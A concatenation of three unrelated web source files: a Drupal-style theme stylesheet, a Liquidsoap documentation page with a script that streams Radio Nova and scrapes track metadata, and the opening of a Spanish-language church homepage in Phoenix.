.region-header #block-user-login .item-list li.last {
padding-left: 0.5em; /* LTR */
}
.region-header #block-user-login ul.openid-links li.last {
padding-left: 0; /* LTR */
}
.region-header #user-login-form li.openid-link a,
.region-header #user-login li.openid-link a {
padding-left: 20px; /* LTR */
}
.region-header #block-user-login .form-actions {
margin: 4px 0 0;
padding: 0;
clear: both;
}
.region-header #block-user-login input.form-submit {
border: 1px solid;
border-color: #ccc;
border-color: rgba(255, 255, 255, 0.5);
background: #eee;
background: rgba(255, 255, 255, 0.7);
margin: 4px 0;
padding: 3px 8px;
}
.region-header #block-user-login input.form-submit:hover,
.region-header #block-user-login input.form-submit:focus {
background: #fff;
background: rgba(255, 255, 255, 0.9);
}
/* Search block in region header. */
.region-header #block-search-form {
width: 208px;
}
.region-header #block-search-form .form-text {
width: 154px;
}
/* Language switcher block in region header. */
.region-header .block-locale ul li {
display: inline;
padding: 0 0.5em;
}
/* ------------------- Main Menu -------------------------- */
#main-menu {
clear: both;
}
#main-menu-links {
font-size: 0.929em;
margin: 0 5px;
padding: 0;
text-align: left; /* LTR */
}
#main-menu-links li {
float: none;
list-style: none;
margin: 0;
padding: 0;
width: 100%;
}
#main-menu-links a {
color: #333;
background: #ccc;
background: rgba(255, 255, 255, 0.7);
float: none;
display: block;
text-decoration: none;
text-shadow: 0 1px #eee;
border-radius: 8px;
margin-bottom: 4px;
padding: 0.9em 0 0.9em 10px;
}
#main-menu-links a:hover,
#main-menu-links a:focus {
background: #f6f6f2;
background: rgba(255, 255, 255, 0.95);
}
#main-menu-links a:active {
background: #b3b3b3;
background: rgba(255, 255, 255, 1);
}
#main-menu-links li a.active {
border-bottom: none;
}
/* ------------------- Secondary Menu --------------------- */
#secondary-menu-links {
float: right; /* LTR */
font-size: 0.929em;
margin: 0 10px;
}
#secondary-menu-links li{
margin: 0;
padding: 0;
}
#secondary-menu-links a {
display: inline-block;
padding: 0.8em;
}
#secondary-menu-links a:hover,
#secondary-menu-links a:focus {
text-decoration: underline;
}
/* ------------------- Main ------------------------------- */
#main {
margin-top: 20px;
margin-bottom: 40px;
}
/* ------------------- Featured --------------------------- */
#featured {
text-align: center;
font-size: 1.2em;
font-weight: normal;
line-height: 1.4;
padding: 20px 10px 45px;
margin: 0;
background: #f0f0f0;
background: rgba(30, 50, 10, 0.08);
border-bottom: 1px solid #e7e7e7;
text-shadow: 1px 1px #fff;
}
#featured h2 {
font-size: 1.2em;
line-height: 1;
}
#featured p {
margin: 0;
padding: 0;
}
/* ------------------- Highlighted ------------------------ */
#highlighted {
border-bottom: 1px solid #d3d7d9;
font-size: 120%;
}
/* ------------------- Help ------------------------------- */
.region-help {
border: 1px solid #d3d7d9;
padding: 0 1.5em;
margin-bottom: 30px;
}
/* ------------------- Content ---------------------------- */
.content {
margin-top: 0px;
}
h1#page-title {
font-size: 2em;
line-height: 1;
}
#content h2 {
margin-bottom: 5px;
font-size: 1.429em;
line-height: 1.4;
}
#content h2 a:link {
padding-top: 18px;
}
.node .content {
font-size: 1.071em;
}
.node-teaser .content {
font-size: 1em;
}
.node-teaser h2 {
margin-top: 0;
padding-top: 0.5em;
}
.node-teaser h2 a {
color: #181818;
}
.node-teaser {
border-bottom: 1px solid #d3d7d9;
margin-bottom: 30px;
padding-bottom: 15px;
}
.node-sticky {
background: #f9f9f9;
background: rgba(0, 0, 0, 0.024);
border: 1px solid #d3d7d9;
padding: 0 15px 15px;
}
.node-full {
background: none;
border: none;
padding: 0;
}
.node-teaser .content {
clear: none;
line-height: 1.6;
}
.meta {
font-size: 0.857em;
color: #68696b;
margin-bottom: 0;
}
.submitted a {
padding: 10px 0 15px;
}
.submitted .user-picture img {
float: left; /* LTR */
height: 20px;
margin: 1px 5px 0 0; /* LTR */
}
.field-type-taxonomy-term-reference {
margin: 0 0 1.2em;
}
.field-type-taxonomy-term-reference .field-label {
font-weight: normal;
margin: 0;
padding-right: 5px; /* LTR */
}
.field-type-taxonomy-term-reference .field-label,
.field-type-taxonomy-term-reference ul.links {
font-size: 0.8em;
}
.view-mode-teaser .field-type-taxonomy-term-reference .field-label,
.view-mode-teaser .field-type-taxonomy-term-reference ul.links {
font-size: 0.821em;
}
.field-type-taxonomy-term-reference ul.links {
padding: 0;
margin: 0;
list-style: none;
}
.field-type-taxonomy-term-reference ul.links li {
float: left; /* LTR */
padding: 0 1em 0 0; /* LTR */
white-space: nowrap;
}
.field-type-taxonomy-term-reference ul.links li a {
padding: 5px 0 20px;
}
.link-wrapper {
text-align: right;
}
.field-type-image img,
.user-picture img {
margin: 0 0 1em;
}
ul.links {
color: #68696b;
font-size: 0.821em;
}
ul.links.inline li a {
display: inline;
padding: 18px 0 5px;
}
.unpublished {
margin: -20px -15px 0;
padding: 20px 15px 0;
}
.unpublished .comment-text .comment-arrow {
border-left: 1px solid #fff4f4;
border-right: 1px solid #fff4f4;
}
/* ------------------- Comments --------------------------- */
.comment h2.title {
margin-bottom: 1em;
}
.comment div.user-picture img {
margin-left: 0; /* LTR */
}
.comment {
margin-bottom: 20px;
display: table;
vertical-align: top;
}
.comment .attribution {
display: table-cell;
padding: 0 30px 0 0; /* LTR */
vertical-align: top;
overflow: hidden;
}
.comment .attribution img {
margin: 0;
border: 1px solid #d3d7d9;
}
.comment .attribution .username {
white-space: nowrap;
}
.comment .submitted p {
margin: 4px 0;
font-size: 1.071em;
line-height: 1.2;
}
.comment .submitted .comment-time {
font-size: 0.786em;
color: #68696b;
}
.comment .submitted .comment-permalink {
font-size: 0.786em;
text-transform: lowercase;
}
.comment .submitted .comment-permalink a {
padding: 8px 0 18px;
}
.comment .content {
font-size: 0.929em;
line-height: 1.6;
}
.comment .comment-arrow {
background: url(../images/comment-arrow.gif) no-repeat 0 center transparent; /* LTR */
border-left: 1px solid;
border-right: 1px solid;
height: 40px;
margin-left: -47px; /* LTR */
margin-top: 10px;
position: absolute;
width: 20px;
}
.comment .comment-text {
padding: 10px 25px;
border: 1px solid #d3d7d9;
display: table-cell;
vertical-align: top;
position: relative;
width: 100%;
}
.comment .comment-text h3 a{
padding-top: 22px;
}
.comment .indented {
margin-left: 40px; /* LTR */
}
.comment ul.links {
padding: 0 0 0.25em 0;
}
.comment ul.links li {
padding: 0 0.5em 0 0; /* LTR */
}
.comment.unpublished {
margin-right: 5px; /* LTR */
padding: 5px 2px 5px 5px; /* LTR */
}
.comment.unpublished .comment-text .comment-arrow {
border-left: 1px solid #fff4f4;
border-right: 1px solid #fff4f4;
}
/* ------------------- Sidebar ---------------------------- */
.sidebar .section {
padding-top: 10px;
}
.sidebar .block {
border: 1px solid;
padding: 15px 20px;
margin: 0 0 20px;
}
.sidebar h2 {
margin: 0 0 0.5em;
border-bottom: 1px solid #d6d6d6;
padding-bottom: 5px;
text-shadow: 0 1px 0 #fff;
font-size: 1.071em;
line-height: 1.2;
}
.sidebar .block .content {
font-size: 0.914em;
line-height: 1.4;
}
.sidebar tbody {
border: none;
}
.sidebar tr.even,
.sidebar tr.odd {
background: none;
border-bottom: 1px solid #d6d6d6;
}
/* ------------------- Triptych --------------------------- */
#triptych-wrapper {
background-color: #f0f0f0;
background: rgba(30, 50, 10, 0.08);
border-top: 1px solid #e7e7e7;
}
#triptych h2 {
color: #000;
font-size: 1.4em;
margin-bottom: 0.6em;
text-shadow: 0 1px 0 #fff;
text-align: center;
line-height: 1;
}
#triptych .block {
margin-bottom: 1em;
padding-bottom: 1em;
border-bottom: 1px solid #dfdfdf;
line-height: 1.3;
}
#triptych .block.last {
border-bottom: none;
}
#triptych .block ul li,
#triptych .block ol li {
list-style: none;
}
#triptych .block ul,
#triptych .block ol {
padding-left: 0;
}
#triptych #block-user-login .form-text {
width: 185px;
}
#triptych #block-user-online p {
margin-bottom: 0;
}
#triptych #block-node-syndicate h2 {
overflow: hidden;
width: 0;
height: 0;
}
#triptych-last #block-node-syndicate {
text-align: right;
}
#triptych #block-search-form .form-type-search input {
width: 185px;
}
#triptych-middle #block-system-powered-by {
text-align: center;
}
#triptych-last #block-system-powered-by {
text-align: right;
}
/* ------------------- Footer ----------------------------- */
#footer-wrapper {
color: #c0c0c0;
color: rgba(255, 255, 255, 0.65);
font-size: 0.857em;
}
#footer-wrapper a {
color: #fcfcfc;
color: rgba(255, 255, 255, 0.8);
}
#footer-wrapper a:hover,
#footer-wrapper a:focus {
color: #fefefe;
color: rgba(255, 255, 255, 0.95);
text-decoration: underline;
}
#footer-wrapper .block {
margin: 20px 0;
border: 1px solid #444;
border-color: rgba(255, 255, 255, 0.1);
padding: 10px;
}
#footer-columns .block-menu,
#footer .block {
margin: 0;
padding: 0;
border: none;
}
#footer .block {
margin: 0.5em 0;
}
#footer .block .content {
padding: 0.5em 0;
margin-top: 0;
}
#footer .block h2 {
margin: 0;
}
#footer-columns h2 {
border-bottom: 1px solid #555;
border-color: rgba(255, 255, 255, 0.15);
font-size: 1em;
margin-bottom: 0;
padding-bottom: 3px;
text-transform: uppercase;
}
#footer-columns .content {
margin-top: 0;
}
#footer-columns p {
margin-top: 1em;
}
#footer-columns .content ul {
list-style: none;
padding-left: 0; /* LTR */
margin-left: 0;
}
#footer-columns .content li {
list-style: none;
margin: 0;
padding: 0;
}
#footer-columns .content li a {
display: block;
border-bottom: 1px solid #555;
border-color: rgba(255, 255, 255, 0.15);
line-height: 1.2;
padding: 0.8em 2px 0.8em 20px; /* LTR */
text-indent: -15px;
}
#footer-columns .content li a:hover,
#footer-columns .content li a:focus {
background-color: #1f1f21;
background-color: rgba(255, 255, 255, 0.05);
text-decoration: none;
}
#footer {
letter-spacing: 0.2px;
margin-top: 30px;
border-top: 1px solid #555;
border-color: rgba(255, 255, 255, 0.15);
}
#footer .region {
margin-top: 20px;
}
#footer .block {
clear: both;
}
#footer ul,
#footer li {
list-style: none;
margin: 0;
padding: 0;
}
#footer li a {
float: left; /* LTR */
padding: 0 12px;
display: block;
border-right: 1px solid #555; /* LTR */
border-color: rgba(255, 255, 255, 0.15);
}
#footer li.first a {
padding-left: 0; /* LTR */
}
#footer li.last a {
padding-right: 0; /* LTR */
border-right: none; /* LTR */
}
#footer-wrapper tr.odd {
background-color: transparent;
}
#footer-wrapper tr.even {
background-color: #2c2c2c;
background-color: rgba(0, 0, 0, 0.15);
}
/* ------------------- System Tabs ------------------------ */
.tabs {
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
margin-bottom: 20px;
}
.tabs ul.primary {
padding: 0 3px;
margin: 0;
overflow: hidden;
border: none;
background: transparent url(../images/tabs-border.png) repeat-x left bottom;
}
.tabs ul.primary li {
display: block;
float: left; /* LTR */
vertical-align: bottom;
margin: 0 5px 0 0; /* LTR */
}
.tabs ul.primary li.active a {
border-bottom: 1px solid #ffffff;
}
.tabs ul.primary li a {
color: #000;
background-color: #ededed;
height: 1.8em;
line-height: 1.9;
display: block;
font-size: 0.929em;
float: left; /* not LTR */
padding: 0 10px 3px;
margin: 0;
text-shadow: 0 1px 0 #fff;
border-top-left-radius: 6px;
border-top-right-radius: 6px;
}
.tabs ul.primary li.active a {
background-color: #ffffff;
}
.tabs ul.secondary {
border-bottom: none;
padding: 0.5em 0;
}
.tabs ul.secondary li {
display: block;
float: left; /* LTR */
}
.tabs ul.secondary li:last-child {
border-right: none; /* LTR */
}
.tabs ul.secondary li:first-child {
padding-left: 0; /* LTR */
}
.tabs ul.secondary li a {
padding: 0.25em 0.5em;
}
.tabs ul.secondary li a.active {
background: #f2f2f2;
border-bottom: none;
border-radius: 5px;
}
ul.action-links {
list-style: none;
margin: 5px;
padding: 0.5em 1em;
}
ul.action-links li {
display: inline-block;
margin-left: 10px;
}
ul.action-links li a {
padding-left: 15px;
background: url(../images/add.png) no-repeat left center;
margin: 0 10px 0 0;
}
/* ------------------- Messages --------------------------- */
#messages {
padding: 20px 0 5px;
margin: 0 auto;
}
.featured #messages {
background: #f0f0f0;
background: rgba(30, 50, 10, 0.08);
}
div.messages {
margin: 8px 15px;
}
/* ------------------- Breadcrumbs ------------------------ */
.breadcrumb {
font-size: 0.929em;
padding: 10px;
}
.breadcrumb a {
padding: 12px 0;
}
/* ------------------- User Profile ----------------------- */
.profile .user-picture {
float: none;
}
/* ------------------- Password Meter --------------------- */
.confirm-parent,
.password-parent {
width: 34em;
}
.password-parent,
div.form-item div.password-suggestions {
position: relative;
}
.password-strength-text,
.password-strength-title,
div.password-confirm {
font-size: 0.82em;
}
.password-strength-text {
margin-top: 0.2em;
}
div.password-confirm {
margin-top: 2.2em;
width: 20.73em;
}
/* ------------------- Buttons ---------------------------- */
input.form-submit,
a.button {
background: #fff url(../images/buttons.png) 0 0 repeat-x;
border: 1px solid #e4e4e4;
border-bottom: 1px solid #b4b4b4;
border-left-color: #d2d2d2;
border-right-color: #d2d2d2;
color: #3a3a3a;
cursor: pointer;
font-size: 0.929em;
font-weight: normal;
text-align: center;
margin-bottom: 1em;
margin-right: 0.6em; /* LTR */
padding: 4px 17px;
border-radius: 15px;
}
a.button:link,
a.button:visited,
a.button:hover,
a.button:focus,
a.button:active {
text-decoration: none;
color: #5a5a5a;
}
/* ------------------- Form Elements ---------------------- */
fieldset {
background: #ffffff;
border: 1px solid #cccccc;
margin-top: 10px;
margin-bottom: 32px;
padding: 0 0 10px;
position: relative;
top: 12px; /* Offsets the negative margin of legends */
border-radius: 4px;
}
.fieldset-wrapper {
margin-top: 25px;
}
.node-form .vertical-tabs .fieldset-wrapper {
margin-top: 0;
}
.filter-wrapper {
top: 0;
padding: 1em 0 0.2em;
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.filter-help a {
font-size: 0.857em;
padding: 2px 20px 0;
}
.filter-wrapper .form-item label {
margin-right: 10px;
}
.filter-wrapper .form-item {
padding: 0 0 0.5em 0.5em;
}
.filter-guidelines {
padding: 0 1.5em 0 0.5em;
}
fieldset.collapsed {
background: transparent;
border-radius: 0;
}
fieldset legend {
background: #dbdbdb;
border: 1px solid #ccc;
border-bottom: none;
color: #3b3b3b;
display: block;
height: 2em;
left: -1px; /* LTR */
font-family: "Lucida Grande", "Lucida Sans Unicode", Verdana, sans-serif;
line-height: 2;
padding: 0;
position: absolute;
text-indent: 10px;
text-shadow: 0 1px 0 #fff;
top: -12px;
width: 100%;
border-top-left-radius: 4px;
border-top-right-radius: 4px;
}
fieldset.collapsed legend {
border-radius: 4px;
}
fieldset legend a {
color: #3b3b3b;
}
fieldset legend a:hover,
fieldset legend a:focus,
fieldset legend a:active {
color: #000;
}
fieldset .fieldset-wrapper {
padding: 0 10px;
}
fieldset .fieldset-description {
margin-top: 5px;
margin-bottom: 1em;
line-height: 1.4;
color: #3c3c3c;
font-style: italic;
}
input {
margin: 2px 0;
padding: 4px;
}
input,
textarea {
font-size: 0.929em;
}
textarea {
line-height: 1.5;
}
textarea.form-textarea,
select.form-select {
padding: 4px;
}
input.form-text,
input.form-tel,
input.form-email,
input.form-url,
input.form-search,
input.form-number,
input.form-color,
textarea.form-textarea,
select.form-select {
border: 1px solid #ccc;
}
input.form-submit:hover,
input.form-submit:focus {
background: #dedede;
}
.password-suggestions ul li {
margin-left: 1.2em; /* LTR */
}
.form-item {
margin-bottom: 1em;
margin-top: 2px;
}
.form-item label {
font-size: 0.929em;
}
.form-type-radio label,
.form-type-checkbox label {
margin-left: 4px;
}
.form-type-radio .description,
.form-type-checkbox .description {
margin-left: 2px;
}
.form-actions {
padding-top: 10px;
}
/* Contact Form */
.contact-form #edit-name {
width: 75%;
border-radius: 4px;
}
.contact-form #edit-mail {
width: 75%;
border-radius: 4px;
}
.contact-form #edit-subject {
width: 75%;
border-radius: 4px;
}
.contact-form #edit-message {
width: 76.3%;
border-top-left-radius: 4px;
border-top-right-radius: 4px;
}
/* ------------------- Disabled Form Elements ------------- */
input.form-button-disabled,
input.form-button-disabled:hover,
input.form-button-disabled:focus,
input.form-button-disabled:active,
.form-disabled input,
.form-disabled select,
.form-disabled textarea {
background: #ededed;
border-color: #bbb;
color: #717171;
}
.form-disabled label {
color: #717171;
}
/* ------------------- Animated Throbber ------------------ */
.js input.form-autocomplete {
background-position: 100% 4px; /* LTR */
}
.js input.throbbing {
background-position: 100% -16px; /* LTR */
}
/* ------------------- Comment Form ----------------------- */
.comment-form label {
float: left; /* LTR */
font-size: 0.929em;
width: 120px;
}
.comment-form input,
.comment-form .form-select {
margin: 0;
border-radius: 4px;
}
.comment-form .form-type-textarea label {
float: none;
}
.comment-form .form-item,
.comment-form .form-radios,
.comment-form .form-type-checkbox,
.comment-form .form-select {
margin-bottom: 10px;
overflow: hidden;
}
.comment-form .form-type-checkbox,
.comment-form .form-radios {
margin-left: 120px; /* LTR */
}
.comment-form .form-type-checkbox label,
.comment-form .form-radios label {
float: none;
margin-top: 0;
}
.comment-form input.form-file {
width: auto;
}
.no-sidebars .comment-form .form-text {
width: 800px;
}
.one-sidebar .comment-form .form-text {
width: 500px;
}
.two-sidebars .comment-form .form-text {
width: 320px;
}
.comment-form .form-item .description {
font-size: 0.786em;
line-height: 1.2;
margin-left: 120px; /* LTR */
}
#content h2.comment-form {
margin-bottom: 0.5em;
}
.comment-form .form-textarea {
border-top-left-radius: 4px;
border-top-right-radius: 4px;
}
.comment-form fieldset.filter-wrapper .fieldset-wrapper,
.comment-form .text-format-wrapper .form-item {
margin-top: 0;
margin-bottom: 0;
}
.filter-wrapper label {
width: auto;
float: none;
}
.filter-wrapper .form-select {
min-width: 120px;
}
.comment-form fieldset.filter-wrapper .tips {
font-size: 0.786em;
}
#comment-body-add-more-wrapper .form-type-textarea label {
margin-bottom: 0.4em;
}
#edit-actions input {
margin-right: 0.6em; /* LTR */
}
/* ------------------- Other Overrides -------------------- */
div.password-suggestions {
border: 0;
}
.ui-widget-overlay {
background: #222222;
opacity: 0.7;
}
div.vertical-tabs .vertical-tabs-panes fieldset.vertical-tabs-pane {
padding: 1em;
}
#forum .name {
font-size: 1.083em;
}
#forum .description {
font-size: 1em;
}
/* ------------------- Search Form ------------------------ */
#block-search-form {
padding-bottom: 7px;
}
#block-search-form .content {
margin-top: 0;
}
#search-form input[type="search"],
#block-search-form input[type="search"] {
box-sizing: border-box;
padding: 4px;
-webkit-appearance: textfield;
}
#search-form input[type="search"]::-webkit-search-decoration,
#block-search-form input[type="search"]::-webkit-search-decoration {
display: none;
}
#search-form input#edit-keys,
#block-search-form .form-item-search-block-form input {
float: left; /* LTR */
font-size: 1em;
margin-right: 5px;
width: 9em;
}
#search-block-form input.form-submit,
#search-form input.form-submit {
margin-left: 0;
margin-right: 0;
height: 25px;
width: 34px;
padding: 0;
cursor: pointer;
text-indent: -9999px;
border-color: #e4e4e4 #d2d2d2 #b4b4b4;
background: url(../images/search-button.png) no-repeat center top;
overflow: hidden;
}
#search-block-form input.form-submit:hover,
#search-block-form input.form-submit:focus,
#search-form input.form-submit:hover,
#search-form input.form-submit:focus {
background-position: center bottom;
}
#search-form .form-item-keys label {
display: block;
}
/* ------------------- Search Results --------------------- */
ol.search-results {
padding-left: 0;
}
.search-results li {
border-bottom: 1px solid #d3d7d9;
padding-bottom: 0.4285em;
margin-bottom: 0.5em;
}
.search-results li:last-child {
border-bottom: none;
padding-bottom: 0;
margin-bottom: 1em;
}
.search-results .search-snippet-info {
padding-left: 0;
}
/* ------------------- Shortcut Links --------------------- */
.shortcut-wrapper {
margin: 2.2em 0 1.1em 0; /* Same as usual h1#page-title margin. */
}
.shortcut-wrapper h1#page-title {
float: left; /* LTR */
margin: 0;
}
div.add-or-remove-shortcuts {
padding-top: 0.9em;
}
.overlay div.add-or-remove-shortcuts {
padding-top: 0.8em;
}
/* ------------------- Admin-specific Theming ------------- */
.page-admin #content img {
margin-right: 15px; /* LTR */
}
.page-admin #content .simpletest-image img {
margin: 0;
}
.page-admin-structure-block-demo .block-region {
background: #ffff66;
border: 1px dotted #9f9e00;
color: #000;
font: 90% "Lucida Grande", "Lucida Sans Unicode", sans-serif;
margin: 5px;
padding: 5px;
text-align: center;
text-shadow: none;
}
.page-admin-structure-block-demo #featured .block-region {
font-size: 0.55em;
}
.page-admin-structure-block-demo #header .block-region {
width: 500px;
}
.page-admin #admin-dblog img {
margin: 0 5px;
}
/* Fix spacing when Seven is used in the overlay. */
#system-theme-settings fieldset {
padding: 0;
}
#system-theme-settings fieldset .fieldset-legend {
margin-top: 0;
}
/* Configuration. */
div.admin .right,
div.admin .left {
width: 49%;
margin: 0;
}
div.admin-panel {
background: #fbfbfb;
border: 1px solid #ccc;
margin: 10px 0;
padding: 0 5px 5px;
}
div.admin-panel h3 {
margin: 16px 7px;
}
div.admin-panel dt {
border-top: 1px solid #ccc;
padding: 7px 0 0;
}
div.admin-panel dd {
margin: 0 0 10px;
}
div.admin-panel .description {
margin: 0 0 14px 7px;
}
/* ------------------- Overlay Layout Styles -------------- */
.overlay #main,
.overlay #content {
width: auto;
float: none;
}
.overlay #page {
padding: 0 2em;
}
.overlay .region-page-top,
.overlay #header,
.overlay #page-title,
.overlay #featured,
.overlay #sidebar-first,
.overlay #triptych-wrapper,
.overlay #footer-wrapper {
display: none;
}
.overlay-processed .field-type-image {
display: block;
float: none;
}
.overlay #messages {
width: auto;
}
/* ------------------- Poll ------------------------------- */
.node .poll {
margin: 2em 0;
}
.node .poll #edit-choice {
margin: 0 0 1.5em;
}
.poll .vote-form {
text-align: left; /* LTR */
margin: 0;
}
.poll .percent {
font-size: 0.857em;
font-style: italic;
margin-bottom: 3em;
margin-top: -3.2em;
float: right; /* LTR */
text-align: right; /* LTR */
}
.poll .choice-title {
clear: right; /* LTR */
}
.poll .total {
font-size: 0.929em;
font-style: italic;
text-align: right; /* LTR */
clear: both;
}
.node .poll {
margin: 1.8em 0 0;
}
.node .poll .text {
margin-right: 6.75em;
}
.node .poll #edit-choice {
margin: 0 0 1.2em;
}
.poll .bar .foreground {
background-color: #666;
}
#footer-wrapper .poll .bar {
background-color: #666;
}
#footer-wrapper .poll .bar .foreground {
background-color: #ddd;
}
/* ------------------- Book ------------------------------- */
.book-navigation .menu {
border-top: 1px solid #d6d6d6;
}
.book-navigation .book-pager {
border-bottom: 1px solid #d6d6d6;
border-top: 1px solid #d6d6d6;
margin: 0;
}
/* ------------------- Menu Toggle Link ------------------- */
a#menu-toggle {
display:none;
background: none repeat scroll 0 0 rgba(255, 255, 255, 0.7);
padding: 0.7em 0 0.7em 10px;
text-decoration: none;
text-shadow: 0 1px #EEEEEE;
position:relative;
}
a#menu-toggle:after {
content:"";
background: url('../images/toggle.png') no-repeat;
width: 22px;
height: 30px;
display: inline-block;
position: absolute;
right: 10px;
}
/* ------------------- Media Queries ---------------------- */
@media all and (max-width: 460px) {
/* ----------------- Menu on Small Resolutions ---------- */
a#menu-toggle {
display:block;
}
#main-menu-links {
display: none;
height: auto;
}
}
@media all and (min-width: 461px) and (max-width: 900px) {
/* ------------------ Header and Menus ------------------- */
.region-header {
margin: .5em 5px .75em;
}
#logo {
/* padding: 5px 0 0 5px;*/ /* LTR */
}
#name-and-slogan {
padding: 10px 10px 8px;
}
#main-menu-links {
margin: 0 5px;
padding: 0;
text-align: center;
}
#main-menu-links li {
float: left;
margin-right: 5px;
padding: 0;
display: inline-block;
width: 32.75%;
}
#main-menu-links li:nth-child(3n) {
margin-right: -5px; /* LTR */
}
#main-menu-links a {
float: none;
display: block;
border-radius: 8px;
margin-bottom: 5px;
padding: 0.9em 5px;
}
#featured {
font-size: 1.43em;
}
#featured h2 {
font-size: 1.174em;
}
#triptych h2 {
font-size: 1.243em;
margin-bottom: 0.9em;
}
}
@media all and (min-width: 901px) {
.region-header {
margin: 1em 5px 1.5em;
}
#logo {
/*padding: 15px 15px 15px 10px;*/ /* LTR */
}
#name-and-slogan {
padding: 26px 0 0;
margin: 0 0 30px 15px; /* LTR */
}
#site-name {
font-size: 1.821em;
}
#main-menu-links {
font-size: 0.929em;
margin: 0;
padding: 0 15px;
}
#main-menu-links li {
float: left; /* LTR */
list-style: none;
padding: 0 1px;
margin: 0 1px;
width: auto;
}
#main-menu-links a {
float: left; /* LTR */
padding: 0.7em 0.8em;
margin-bottom: 0;
border-bottom-left-radius: 0;
border-bottom-right-radius: 0;
}
#featured {
font-size: 1.643em;
line-height: 1.4;
}
#featured h2 {
font-size: 1.174em;
line-height: 1;
}
.featured #main-menu-links li a:active,
.featured #main-menu-links li a.active {
background: #f0f0f0;
background: rgba(240, 240, 240, 1.0);
}
}
/* ------------------- Misc Fixes ------------------------- */
.element-invisible {
position: absolute !important;
clip: rect(1px, 1px, 1px, 1px);
left: 0;
}
|
website/orig/legacy/doc-1.1.0/scripts/radio-nova.html | savonet/liquidsoap-full | <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Liquidsoap 1.1.0 :: Audio Stream Generation</title>
<link href="../../css/new.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="//www.google.com/jsapi"></script>
<link rel="shortcut icon" href="../favicon.ico" />
<script>
google.load("jquery", "1.6.1");
google.load("jqueryui", "1.8.14");
</script>
<script type="text/javascript" src="../../js/jQuery.syntax/jquery.syntax.min.js"></script>
<script type="text/javascript" src="../../js/liq-jquery.js"></script>
</head>
<body>
<div class="menu">
<ul>
<li id="menu-developers">
<a href="https://github.com/savonet/liquidsoap/issues" target="_blank">developpers</a>
</li>
<li id="menu-doc-api-www">
<a href="../reference.html">API</a>
</li>
<li id="menu-support">
<a href="documentation.html">documentation</a>
</li>
<li id="menu-download">
<a href="../../download.html">download</a>
</li>
<li id="menu-about">
<a href="../../index.html">about</a>
</li>
</ul>
</div>
<div class="section" id="main">
<h1>radio-nova.liq</h1>
<div class="content">
<pre class="syntax">#!/usr/bin/liquidsoap
# Liquidsoap script to listen to radio nova, grabbing metadata
# on the webpage.
# Disable file log, enable stdout log
set("log.file",false)
set("log.stdout",true)
# Initial input.http source
nova = input.http("http://broadcast.infomaniak.net:80/radionova-high.mp3")
# Remove metadata, add a hook to insert new metadata
nova = insert_metadata(id="nova",
clear_metadata(nova))
# This string references will be used to keed track
# of previous metadata
title = ref "unknown title"
artist = ref "unknown artist"
# Capitalize and lowercase
def cap(s)
string.capitalize(string.case(s))
end
# Process to grab metadata on the webpage
# Returns "artist","title"
def metas() =
s = list.hd(
get_process_lines(
"wget -q http://www.novaplanet.com -O - | grep 'scroll_play'"))
s = string.extract(pattern='scroll_play\("([^"]*)",\s*"([^"]*)"',s)
(cap(list.assoc("1",s)),cap(list.assoc("2",s)))
end
# Process that inserts grabbed metadata
# to the stream
def add_meta_nova()
log = log(level=4)
log("Checking for metas")
x = metas()
new_artist = fst(x)
new_title = snd(x)
old_title = !title
old_artist = !artist
if (old_title != new_title or old_title != new_title) and
(new_title != "" or new_artist != "")
then
log("Got new metas: #{new_artist} -- #{new_title}")
ignore(
server.execute(
'nova.insert artist="#{new_artist}",title="#{new_title}"'))
title := new_title
artist := new_artist
else
log("Keeping old metas")
end
0.2
end
# Schedule the insert process every 0.2 second
add_timeout(fast=false,0.2,add_meta_nova)
# function to display new metadatas
def print_meta(m) =
def print(z) =
label = fst(z)
value = snd(z)
log("Metadata: #{label}=#{value}")
end
list.iter(print,m)
end
# Hook the previous function on the stream
nova = on_metadata(print_meta,nova)
# Play the stream !
out(nova)
</pre> <a href="radio-nova.liq">
<img class="grab" src="../../images/grab.png" alt="Grab the code!" title="Grab the code!">
</a>
</div>
<div id="footer"> 2003-2017 Savonet team</div>
</div>
<script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
<script type="text/javascript" src="../../js/search.js"></script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-927362-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</body>
</html>
|
oldsite/az23-iglesia-nuevavision.html | jordotech/iglesia | <meta http-equiv="content-type" content="text/html;charset=X-MAC-ROMAN">
<HTML>
<HEAD>
<TITLE>iglesia nueva vision </TITLE>
<META NAME="GENERATOR" CONTENT="Adobe Golive6.0 Mac"/>
<META NAME="description" CONTENT="Iglesia Nueva Vision dice Vengan y acompanenos a alabar y darle gloria a nuestro Dios vivo "/>
<META NAME="keywords" CONTENT="IGLESIA , Iglesia Nueva Vision "/>
</HEAD>
<BODY BGCOLOR="#ffffff" TEXT="#ff0000">
<div align="center">
<p><font size="-1" color="#881912">Iglesia Nueva Visión de Phoenix, Arizona dice Vengan y acompanenos a alabar y darle gloria a nuestro Dios vivo.</font>
<table width="727" border="0" cellspacing="2" cellpadding="0" height="515">
<tr height="511">
<td width="161" height="511">
<div align="center">
<IMG SRC="imi-salto.jpg" alt="iglesia nueva vision"
WIDTH="158" HEIGHT="511" ALIGN="absmiddle" BORDER="0" NATURALSIZEFLAG="0"></div>
</td>
<td height="511">
<div align="center">
<FONT COLOR="#ff0000">
</FONT><B><FONT COLOR="#ff0000">Iglesia
Nueva Visión</FONT></B>
<p><b><font size="-1" color="#0000ff">S. 27th Avenida y calle Tonto,<br>
Phoenix, Arizona, 85034</font></b></p>
<p><b><font size="-1" color="#ff0000">Vengan y acompanenos a alabar <br>
y darle gloria a nuestro Dios vivo.</font></b></p>
<p><font size="-1"><br>
<b><font color="#0000ff">Pastora Hrn. Francisca Bustos<br>
Teléfono: (602)252-1480</font></b></font></p>
<p><font size="-1"> </font></p>
</div>
<div align="right">
